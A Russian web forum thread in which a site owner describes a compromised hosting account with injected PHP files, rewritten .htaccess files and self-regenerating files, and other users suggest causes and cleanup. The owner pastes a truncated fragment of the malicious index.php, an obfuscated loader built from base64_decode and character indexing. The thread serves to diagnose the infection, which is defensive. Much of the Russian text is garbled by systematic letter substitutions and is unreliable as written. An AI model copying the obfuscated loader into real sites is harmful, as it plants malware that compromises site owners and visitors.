Взломали сайт или вредоносное ПО?

[pininpro]

Добрый гдень. На днях все 2 сайи на хостинге начали себя странно вести. Один стоит на ОС 2.3, второй на 3.0.3.2. Да вот на первом пересило входить по прямому пути в админку, а второй при загрузке главной просто белая простынь ... Без какого-липотому что кода. Начал разбираться и нашел на фтп в корневых папках вот икие вот файлы:

 

kgdstsir.php

wp-index.php

skgoalssf.php

 

Внутри просто какой-то код непонятный.

 

Даже были автоматом заменены файлы index.php (внутри абракадабра шифрами) и .htaccess.

 

В файле .htaccess внутри код:

 

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule> 

 

При том .htaccess насоздавался абсолютно в каждой папке в корневой директории, куда не зайди внутри есть .htaccess с этим же кодом.

 

index.php имеет следуюещёе согдержимое:

 

<?php
$C6__CC_6C6='2002';
$C6_CCC6__6=base64_decode("ZHBjX2hrMjNuMHU2OG9neXZtOWJqZnExcjRpYWV6cy01bHR4dzc=");$C_C__66C6C=$C6_CCC6__6{26}.$C6_CCC6__6{14}.$C6_CCC6__6{8}.$C6_CCC6__6{13}.$C6_CCC6__6{24}.$C6_CCC6__6{28}.$C6_CCC6__6{3}.$C6_CCC6__6{10}.$C6_CCC6__6{30}.$C6_CCC6__6{28}.$C6_CCC6__6{24}.$C6_CCC6__6{3}.$C6_CCC6__6{27}.$C6_CCC6__6{19}.$C6_CCC6__6{13}.$C6_CCC6__6{24}.$C6_CCC6__6{34};$CC_6_6_C6C=$C6_CCC6__6{21}.$C6_CCC6__6{26}.$C6_CCC6__6{33}.$C6_CCC6__6{28}.$C6_CCC6__6{3}.$C6_CCC6__6{1}.$C6_CCC6__6{10}.$C6_CCC6__6{34}.$C6_CCC6__6{3}.$C6_CCC6__6{2}.$C6_CCC6__6{13}.$C6_CCC6__6{8}.$C6_CCC6__6{34}.$C6_CCC6__6{28}.$C6_CCC6__6{8}.$C6_CCC6__6{34}.$C6_CCC6__6{30};$CCC__66_C6=$C6_CCC6__6{21}.$C6_CCC6__6{26}.$C6_CCC6__6{33}.$C6_CCC6__6{28}.$C6_CCC6__6{3}.$C6_CCC6__6{14}.$C6_CCC6__6{28}.$C6_CCC6__6{34}.$C6_CCC6__6{3}.$C6_CCC6__6{2}.$C6_CCC6__6{13}.$C6_CCC6__6{8}.$C6_CCC6__6{34}.$C6_CCC6__6{28}.$C6_CCC6__6{8}.$C6_CCC6__6{34}.$C6_CCC6__6{30};$C_C6_CC66_=$C6_CCC6__6{21}.$C6_CCC6__6{10}.$C6_CCC6__6{8}.$C6_CCC6__6{2}.$C6_CCC6__6{34}.$C6_CCC6__6{26}.$C6_CCC6__6{13}.$C6_CCC6__6{8}.$C6_CCC6__6{3}.$C6_CCC6__6{28}.$C6_CCC6__6{35}.$C6_CCC6__6{26}.$C6_CCC6__6{30}.$C6_CCC6__6{34}.$C6_CCC6__6{30};$CC6_6_C6_C=$C6_CCC6__6{28}.$C6_CCC6__6{24}.$C6_CCC6__6{24}.$C6_CCC6__6{13}.$C6_CCC6__6{24}.$C6_CCC6__6{3}.$C6_CCC6__6{24}.$C6_CCC6__6{28}.$C6_CCC6__6{1}.$C6_CCC6__6{13}.$C6_CCC6__6{24}.$C6_CCC6__6{34}.$C6_CCC6__6{26}.$C6_CCC6__6{8}.$C6_CCC6__6{14};$C__C6C6_C6=$C6_CCC6__6{2}.$C6_CCC6__6{24}.$C6_CCC6__6{28}.$C6_CCC6__6{27}.$C6_CCC6__6{34}.$C6_CCC6__6{28}.$C6_CCC6__6{3}.$C6_CCC6__6{21}.$C6_CCC6__6{10}.$C6_CCC6__6{8}.$C6_CCC6__6{2}.$C6_CCC6__6{34}.$C6_CCC6__6{26}.$C6_CCC6__6{13}.$C6_CC

 

 

Даже в корневом каилоге добавились папки:

 

wp-admin

 

внутри

 

При этом сайт то рилииет, то нет. Сторонних модулей не сивил. С нечего икое началось. Что гделать? Как это решить? При уднонии этих файлов и папок обновляешь фтп и они снова тут же появляются. Откуда подгружаются - не понятно. Впервые икое.

 

[spectre]

это надо на хостинге сбросить проэтоссы и олистить файлы и прилину их появления

 

могу сгделать недорого и квалифицированно

[pininpro]

Да я и сам проэтоссы сброшу, сугупотому что интересно откуда это и по какой прилине. И как не допустить повторного в будуещём

[Shureg]

Взломали вас. И по полной разгулялись, все загадили. Воссинавливать из бэкапа с тоильной листкой предварительной, менять на все пароли.

38 минут назад, pininpro сказал:

При уднонии этих файлов и папок обновляешь фтп и они снова тут же появляются.

В других файлах у вас шелл(ы) и скрипт(ы), который эти файлы подгружает. А ггде-нибудь на вашем сервере по неожиданному для вас адресу открываются посадочные какой-нибудь фармы. 

[pininpro]

Переименовал корневую папку сайи, а вместо нее создал икую же, но пустую. В итоге в новой пустот папке образовались эти все файлы (которые докаливаются автоматом), а в сирой (с сайтом) полностью пропали сторонние файлы и даже htaccess, которые были по всем папкам. Выходит скрипт или исполняемый файл ггде-то в основе хостинга зарыт. Из последних изменений (судя по даим) это папки: mail и tmp

 

В логах нет следов того, что кто-то подключался за этот период.

Edited September 22, 2021 by pininpro